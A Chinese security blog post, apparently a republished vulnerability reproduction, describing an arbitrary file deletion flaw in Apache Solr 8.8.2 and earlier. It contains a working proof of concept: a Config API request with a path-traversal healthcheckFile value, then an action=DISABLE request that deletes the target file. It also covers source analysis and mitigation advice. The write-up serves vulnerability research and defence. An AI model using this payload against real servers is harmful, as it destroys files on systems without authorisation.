Apache Solr = 8.8.2任意文件删除漏洞复现
2021-05-27 18:48:12 Author: www.secpulse.com(查看原文) 阅读量:165 收藏

上方蓝色字体关注我们,一起学安全!
作者:🐟@Timeline Sec
本文字数:949
阅读时长:3~4min
声明:请勿用作违法用途,否则后果自负
0x01 简介

Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

0x02 漏洞概述

这是个"任意"文件删除漏洞, 可以删除 Files.delete() 能删的任何文件。

0x03 影响版本

Solr <= 8.8.2

0x04 环境搭建

1、先在官网上下个 8.8.2 的 Solr 的安装包, 我这里为了方便就装个 Windows 版的

https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.8.2/

2、开一个有 core 的实例, 我这里用的是 DataImportHandler 的范例配置,进入bin目录下执行

solr.cmd -e dih

访问:http://IP:8983/solr/#/


0x05 漏洞复现

1、在C:WindowsTemp下新建一个test.txt,图有误

2、向任意 core 的 config API 发送一个 POST 包,例如 /solr/db/config 或者 /solr/solr/config 之类的

{
  "add-requesthandler": {
      "name": "/test1", // 这里填 RequestHandler 的路径    
      "class":"solr.PingRequestHandler",    
      "healthcheckFile":"../../../../../../../../../../../../../Windows/Temp/test.txt",  
   }
}

2、访问

http://172.16.255.2:8983/solr/db/config/overlay?omitHeader=true

检查是否创建成功

3、向之前发送包的 config API 发送一个 GET 请求, 参数为action=DISABLE 例如:/solr/db/test1?action=DISABLE

这时会删除之前设置的文件, 同理 action=ENABLE 会生成之前设置的同名文件, 里面写的是一串 healthcheck 信息. 注意 /test 是之前设置过的路径

0x06 漏洞分析

很明显这个漏洞源自于 PingRequestHandler, 当一个 Config API POST 请求被提交之后, Solr 先是执行 handlePOST 函数, 经过一堆 load 和 get 之后会初始化一个 PingRequestHandler

  public void handleRequestBody(SolrQueryRequest req, SolrQueryResponse rsp) throws Exception { 
     ...    
     if ("POST".equals(httpMethod)) {    
       ...      
       try {     
         command.handlePOST();      
       }      
       ...    
     } 
  }

然后这个PingRequestHandler在得到GET指令之后会直接执行 java.nio.file.Files 修改文件的操作而不检查文件的路径信息

  protected void handleEnable(boolean enable) throws SolrException {  
    ...    
    if ( enable ) {    
      try {    
        // write out when the file was created        
        FileUtils.write(healthcheck, Instant.now().toString(), "UTF-8");      
       }       
       ...    
     } else {      
       try {        
          Files.deleteIfExists(healthcheck.toPath());      
       }      
       ...    
     }  
  }
0x07 修复方式

1、官方没有修复建议,毕竟 Files.delete() 有 IOException 兜底,不过可以为 Solr 配置身份校验插件, 从而避免任意用户修改 config;

2、Config API 这种东西就应该给配置个身份验证, 并且也不应该对外开放。

参考链接:https://mp.weixin.qq.com/s/dECH74n5qjrWT9lok8IkPQ

本文作者:Timeline Sec

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/159672.html


文章来源: https://www.secpulse.com/archives/159672.html
如有侵权请联系:admin#unsafe.sh